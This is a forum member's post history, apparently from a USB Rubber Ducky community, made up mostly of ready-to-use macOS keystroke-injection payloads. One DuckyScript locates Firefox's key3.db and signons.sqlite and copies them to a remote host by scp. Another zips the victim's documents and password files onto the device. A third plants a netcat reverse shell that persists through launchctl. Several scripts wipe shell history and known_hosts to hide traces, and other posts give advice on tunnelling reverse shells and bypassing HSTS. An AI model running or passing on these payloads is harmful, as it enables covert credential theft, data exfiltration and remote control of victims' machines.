Jump to content


Active Members
  • Posts

  • Joined

  • Last visited

  • Days Won


Everything posted by Shark3y

  1. It COULD do the second thing. Assuming you program it to do so. I've programmed a number of different types of backdoors from simple netcat connections to actually having the ducky type out and compile a real binary on the fly. Do some reading around here and you'll definitely find what you are looking for. In fact, I'm finding that the duck can do far more interesting things than just backdoors ;)
  2. You only need to patch a port on the reverse side's router as the victim is connecting OUT of their network. This is considered 'normal' behavior more or less. Obviously IDS, certain advanced firewalls and the sort could be problematic but I get the feeling that this is a simple situation. You can have a reverse shell connect through a standard protocol (HTTP), making it less obvious that anything nefarious is happening. More details would be helpful.
  3. I had typed more but it comes down to this. If there is HSTS, you need to find a way to do it other than messing with POST data from a MITM type attack. That way would be something client side, browser exploit, etc.. with a payload that is going to allow you to do what you are talking about. WIFI would only be a possible entry point for an 'attack' like this and isn't likely to be the interesting/innovative parts... I urge you to be careful how you proceed as there are possible legal implications of posting a video like this, especially if you disclose too much information. PM me if you want more info.
  4. <?php $ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (strpos($ref, "facebook")){ header('Location: facebook.html'); } require('error.php'); ?> I have the same issue. Even though I think this makes sense, I don't know the subtleties of php.
  5. Here is my next payload. It requires the twin duck firmware. It also implies the sd card is named "DUCKY". I was playing around with the twin duck firmware and wanted to think of something productive to do while the drive is loading. I came up with stealing all of the *.doc/docx/pdf/odt files inside of ~/Documents/ as well as the firefox saved passwords. My method allows you to steal as many documents as possible UNTIL the drive is ready then whatever you have thus far in the .zip file is sent over to the drive. Maximum speed is what I was going for, since it already takes so damn long for the drive to pop up. The script will blast out an entire bash line, then minimize the terminal. The ducky drive will pop up, and as soon as it disappears you can remove the drive (it ejects it as soon as the other stuff is done). REM title: OSX harvest firefox password files / assorted doccuments --> copy to folder on drive named after user name --> cover tracks DELAY 2000 GUI SPACE DELAY 300 STRING terminal ENTER DELAY 1000 STRING until ls -l /Volumes/DUCKY | grep -q ".*";do find ~/Documents -type f \( -name '*.doc' -o -name '*.docx' -o -name '*.pdf' -o -name '*.odt' \) | sed 's/./\\&/g' | xargs -n1 zip docs_$(whoami)_$(date +"%m-%d-%y"); echo "WAITING FOR DRIVE...";done; echo "MOUNTED... COPYING..."; cp docs_$(whoami)_$(date +"%m-%d-%y").zip /Volumes/DUCKY/; mkdir /Volumes/DUCKY/$(whoami); cd ~/Library/Application\ Support/; cp "$(find . -iname "key3.db")" "$(find . -iname "signons.sqlite")" /Volumes/DUCKY/$(whoami)/; diskutil eject DUCKY; rm docs_$(whoami)_$(date +"%m-%d-%y").zip; history -c; clear; exit; ENTER GUI m I'm working on something much more interesting but I don't want to give too much information until it's done. Just a hint, it's iSight related ;) I hope someone is enjoying these... -Shark3y
  6. Well it works. What do you attribute the slow entry to? When I rolled my own solution, I didn't run into this issue.. however it didn't inject into the page nearly as well as this one. Great work guys! -Shark3y
  7. I did a similar script for OSX and when it comes to firefox, stealing the key3.db and signons.sqlite files seems to be quicker, though the method you use is definitely ingenious. I especially like the saving image file as dll. Very crafty.
  8. Here is fully 'weaponized' firefox saved credential harvesting ducky-script. I started with firefox, because that's what I use. Other browsers coming soon. REM title: OSX harvest firefox password files > secure transfer > cover tracks DELAY 1200 GUI SPACE DELAY 200 STRING terminal ENTER DELAY 1400 STRING cd ~/Library/Application\ Support/ ENTER STRING scp "$(find . -iname "key3.db")" "$(find . -iname "signons.sqlite")" user@host:~/Directory_to_save_creds/ ENTER DELAY 900 STRING yes ENTER DELAY 600 STRING sshpassword ENTER DELAY 1000 STRING rm ~/.ssh/known_hosts ENTER DELAY 100 STRING history -c ENTER DELAY 100 GUI q ENTER I used scp for the file transfer, though you could easily use other methods that may be quicker (no authentication) but this script still executes in about 10 seconds or so. Also, this script removes the obvious evidence such as known_hosts file, as well as clearing the command history. On a side note, I used the find command because sometimes the files are in the mozilla folder, and because the profile folder has a random prefix, this way we get what we want no matter what ;) You can increase the speed of the command by using direct pathnames but you lose some functionality. Enjoy.
  9. Awesome! I had been attempting this myself the other day and I had a functioning keylogger, however I was running into issues properly injecting it into pages without messing up the pages (or taking FOREVER). lulz. Great work.
  10. Hi everyone. I couldn't think of a better way to make a first post than to contribute some content. Here is a very very basic reverse shell ducky script that works on OS X. I've found the OS X payloads to be few and far between and I plan on posting many more of them here. Post yours too! I changed some stuff to be a little more verbose / easy to follow. Hope you enjoy (it's shockingly simple) REM title: osx reverse shell - execute in background - minimize terminal - run on startup DELAY 500 GUI SPACE DELAY 300 STRING terminal ENTER DELAY 600 STRING touch script.sh ENTER STRING echo "mkfifo foo" > script.sh ENTER STRING echo "nc 4444 <foo | /bin/bash 1>foo" >> script.sh ENTER STRING chmod +rwx script.sh ENTER STRING launchctl submit -l someName -p ~/script.sh ENTER STRING ./script.sh& ENTER STRING clear ENTER GUI m This simply creates a script with a netcat command that routes a command prompt to the host ( on port 4444. It adds this script to the launch daemon so that it acts as a backdoor. Note however that because of the way the script is written, it will connect back on login, and not continuously attempt to connect back. It then runs it in background, clears the screen and minimizes. Enjoy, I will be posting more advanced payloads soon! -Shark3y
  • Create New...